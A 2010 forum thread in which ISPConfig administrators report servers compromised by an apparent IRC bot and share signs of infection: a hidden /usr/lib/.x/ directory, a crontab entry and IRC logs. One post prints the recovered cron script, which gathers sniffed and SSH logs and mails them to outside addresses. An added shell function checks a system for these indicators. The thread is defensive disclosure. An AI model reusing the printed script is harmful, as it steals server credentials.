#1  
1st March 2010, 22:44
SamTzu (HowtoForge Supporter)
Hacked!!!

Posting this quickly so that others can check their systems for signs.
ls -ahl /usr/lib/.x/

If that shows you files on your server, you have been hacked, just like we seem to have been on several servers. (All ISPConfig3 servers.)

Powered by ISPConfig 3.0.1.6

Debian Lenny 5.0.3 (OpenVz) Proxmox 1.4
Linux server44 2.6.24-7-pve #1 SMP PREEMPT Tue Jun 2 08:00:29 CEST 2009 i686


Seems like some kind of IRC Bot.
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent

  #2  
1st March 2010, 22:58
edge (Moderator)

All my Debian Lenny servers (with ISPconfig3) are okay.
Quote:
ls -ahl /usr/lib/.x/
ls: cannot access /usr/lib/.x/: No such file or directory
__________________
Never execute code written on a Friday or a Monday.

Last edited by edge; 1st March 2010 at 23:01.
  #3  
1st March 2010, 23:00
SamTzu (HowtoForge Supporter)

(Oops, spoke too soon!! Looks like Ubuntu 8.04 LTS / ISPConfig 2 servers are also vulnerable.)
Also found them in Debian 5.0.3 / ISPConfig 3 servers so far.

If your server has been used to hack other servers, you can see something like this in the 'name'.seen file.

server.name.com none 1267130228 2 Quit: I'll get you for this!!!
m1n2b3b3b m1n2b3b3b!~l3iliboi@161.253.129.67 none 1267471837 3 l3iliboi--
l3iliboi`- l3iliboi`-!~l3iliboi@l3iliboi.users.undernet.org none 1267392327 3 l3iliboi
l3iliboi l3iliboi!~l3iliboi@l3iliboi.users.undernet.org none 1267426060 2 Read error: Operation timed out

Also, crontab -e will show your crontab empty except for a command that calls the /usr/lib/.x/update file.

Last edited by SamTzu; 1st March 2010 at 23:32.
  #4  
2nd March 2010, 00:06
SamTzu (HowtoForge Supporter)

The plot thickens.
This was recovered on one of our test servers that has ISPConfig 2 on Ubuntu 8.04 LTS.

They used /etc/cron.daily/dnsquery:

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log >> test
echo "$(uptime)" >> test
rm -rf httpd.log
echo "named.sn"
cat /usr/lib/named/named.sn >> test
rm -rf /usr/lib/named/named.sn
cd /usr/lib/named
./clean
./cleanssh
echo "ssh.log" >> /usr/lib/test
cat ssh.log >> /usr/lib/test
cd /usr/lib/
mail thelinuxpinguin@yahoo.com -s "$(hostname -f)" < test
mail stormuletzz@yahoo.ca -s "$(hostname -f)" < test
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A

Last edited by SamTzu; 2nd March 2010 at 00:13.
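A read-only check for the indicators described in the posts above (the /usr/lib/.x/ directory and its update script, the crontab line that runs it, the dnsquery cron job, popauth, /usr/lib/named and the '<name>.seen' log), written as an added example and not code from the thread. It assumes the .seen log sits somewhere under /usr/lib (the posts do not say where) and takes a saved `crontab -l` listing as its second argument, so it can be run against a live root, a mounted disk image or a constructed tree.

```shell
#!/bin/sh
# Added example, not code from the thread: report the indicators the posts describe.
# Paths taken from the posts: /usr/lib/.x/ and its 'update' script, a crontab line
# that runs it, /etc/cron.daily/dnsquery, /usr/lib/popauth, /usr/lib/named/,
# the httpd.log sniffer output and a '<name>.seen' IRC log.
# Assumption (not stated in the thread): the .seen log is searched for under usr/lib.

# check_irc_bot ROOT CRONTAB_FILE
#   ROOT          filesystem root to inspect ("/" on a live host, or a mounted image)
#   CRONTAB_FILE  saved output of 'crontab -l' for the account being checked
# Prints one "INDICATOR: ..." line per hit; returns 1 if anything was found, 0 if clean.
check_irc_bot() {
    root=${1%/}            # strip a trailing slash so "$root/usr/lib" is well-formed
    crontab_file=$2
    found=0

    for p in usr/lib/.x usr/lib/.x/update etc/cron.daily/dnsquery \
             usr/lib/popauth usr/lib/named usr/lib/httpd.log; do
        if [ -e "$root/$p" ]; then
            echo "INDICATOR: $root/$p exists"
            found=1
        fi
    done

    # The bot's '<name>.seen' log (post #3); location under usr/lib is an assumption.
    seen=$(find "$root/usr/lib" -name '*.seen' 2>/dev/null || :)
    if [ -n "$seen" ]; then
        echo "INDICATOR: IRC seen-log(s) found:"
        echo "$seen"
        found=1
    fi

    # The crontab entry that calls /usr/lib/.x/update (post #3).
    if [ -n "$crontab_file" ] && grep -q '/usr/lib/\.x/update' "$crontab_file" 2>/dev/null; then
        echo "INDICATOR: crontab runs /usr/lib/.x/update: $(grep '/usr/lib/\.x/update' "$crontab_file")"
        found=1
    fi

    return "$found"
}
```

On a live host, run it as root with `crontab -l > /tmp/ct.txt; check_irc_bot / /tmp/ct.txt` for each account that has a crontab; a non-zero return means at least one indicator was present.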
  #5  
2nd March 2010, 00:35
edge (Moderator)

So... Any fix for this?
  #6  
2nd March 2010, 00:48
edge (Moderator)

Looks like an old hack from 2006.
See: http://ubuntuforums.org/showthread.php?t=221922
Page 2 will show the exact same code as you posted.
Tags
debian, hacked, irc, ispconfig3, lenny
All times are GMT +2.